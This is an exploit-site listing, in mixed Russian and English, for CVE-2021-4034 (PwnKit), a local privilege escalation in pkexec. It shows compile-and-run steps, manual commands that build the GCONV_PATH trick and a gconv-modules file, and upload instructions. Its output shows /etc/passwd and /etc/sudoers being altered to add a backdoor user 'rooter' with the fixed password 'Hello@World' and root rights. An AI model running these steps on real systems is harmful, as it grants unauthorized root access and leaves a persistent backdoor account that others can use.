Sploitus

Exploit for CVE-2021-4034

kitploit · 2026-08-27

Exploit Code

MARKDOWN74 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RVN0XSY-CVE-2021-4034
# CVE-2021-4034

CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation

Усилено на основе CVE-2021-4034: при выполнении эксплойта по умолчанию будет добавлен пользователь `rooter` с паролем `Hello@World`, и пользователь `rooter` будет иметь права sudo.

Refer to CVE-2021-4034, executing Exploit will add username `rooter`, password `Hello@World` by default, and The `rooter` user will have sudo privileges.

## Usage

root@kitploit:~
    
    
    test@some:~$ gcc cve-2021-4034.c -o ./exp
    test@some:~$ ./exp
    /etc/passwd successfully backed up to /tmp/passwd.bak
    File Open successed!
    
    [+]Change sudoers priv.
    /etc/sudoers successfully backed up to /tmp/sudoers.bak
    File Open successed!
    
    [+]Add Root User Success...
    test@some:~$ su rooter
    Password:
    root@some:/home/test# id
    uid=0(root) gid=0(root) groups=0(root)
    root@some:/home/test#
    

### Ручное повышение привилегий

Если в целевой среде нет gcc, можно выполнить команды вручную и скомпилировать pwnkit.so локально.

#### Создание среды эксплуатации - целевая машина

root@kitploit:~
    
    
    $ mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'
    $ mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules
    

#### Компиляция pwnkit.so и pkexec - локально

root@kitploit:~
    
    
    $ mkdir pwnkit
    $ gcc pwnkit.so.c -o pwnkit/pwnkit.so -lcrypt -shared -fPIC
    $ gcc pkexec.c -o pkexec
    

#### Выполнение эксплойта

  1. Загрузите папку pwnkit на целевую машину
  2. Загрузите pkexec на целевую машину
  3. Выполните pkexec



root@kitploit:~
    
    
    $ ./pkexec
    /etc/passwd successfully backed up to /tmp/passwd.bak
    File Open successed!
    
    [+]Change sudoers priv.
    /etc/sudoers successfully backed up to /tmp/sudoers.bak
    File Open successed!
    
    [+]Add Root User Success...